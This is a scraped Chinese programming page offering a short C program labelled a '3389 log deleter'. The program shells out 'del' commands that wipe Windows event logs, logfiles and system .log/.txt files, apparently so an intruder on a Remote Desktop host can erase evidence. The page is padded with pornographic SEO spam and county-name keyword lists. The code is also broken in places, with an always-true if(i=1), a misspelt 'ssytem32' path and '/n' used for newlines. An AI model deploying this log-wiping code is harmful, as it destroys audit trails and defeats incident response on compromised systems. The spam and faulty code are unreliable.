国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 學院 > 編程設計 > 正文

C++實現日志清理代碼

2020-07-14 13:41:30
字體:
來源:轉載
供稿:網友
#include<stdio.h>
#include<string.h>
#include <stdlib.h>
void main()
{
char a[40]="del C:/winnt/system32/logfiles/*.*";
char b[40]="del C:/winnt/ssytem32/config/*.evt";
char c[36]="del C:/winnt/system32/dtclog/*.* ";
char d[36]="del C:/winnt/system32/*.log";
char e[36]="del C:/winnt/system32/*.txt";
char f[36]="del C:/winnt/*.txt ";
char g[36]="del C:/winnt/*.log";

char a1[40]="del C:/windows/system32/logfiles/*.*";
char b1[40]="del C:/windows/ssytem32/config/*.evt";
char c1[36]="del C:/windows/system32/dtclog/*.* ";
char d1[36]="del C:/windows/system32/*.log";
char e1[36]="del C:/windows/system32/*.txt";
char f1[36]="del C:/windows/*.txt ";
char g1[36]="del C:/windows/*.log";

int i;

printf("/t/t/t3389日志刪除器/n/t/t/t/t/twrite by willson QQ:360928283/n/n");
printf("/t/t我的空間是:http://hi.baidu.com/willweiwei/n");
printf("/t/t/thttp://www.rootkit.org.cn/n/n/n");
printf("請輸入您的操作系統名。如果是windows2000,請輸入1!/n如果是windows2003或xp,請輸入其他任意鍵/n請輸入操作系統:");
scanf("%d",&i);
if(i=1)
{
system(a);system(b);system(c);system(d);system(e);system(f);system(g);
}
else
{
system(a1);system(b1);system(c1);system(d1);system(e1);system(f1);system(g1);
}
}

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 广安市| 友谊县| 澄江县| 台湾省| 博野县| 铜陵市| 龙岩市| 大名县| 二连浩特市| 泸定县| 达孜县| 西安市| 三门县| 巫溪县| 平谷区| 合作市| 旬邑县| 克东县| 三穗县| 荥经县| 石林| 澄城县| 武城县| 扎兰屯市| 石柱| 惠东县| 阜新市| 林西县| 习水县| 从化市| 德江县| 兴安县| 巴中市| 武定县| 旬邑县| 防城港市| 康定县| 南阳市| 金堂县| 商南县| 苗栗县|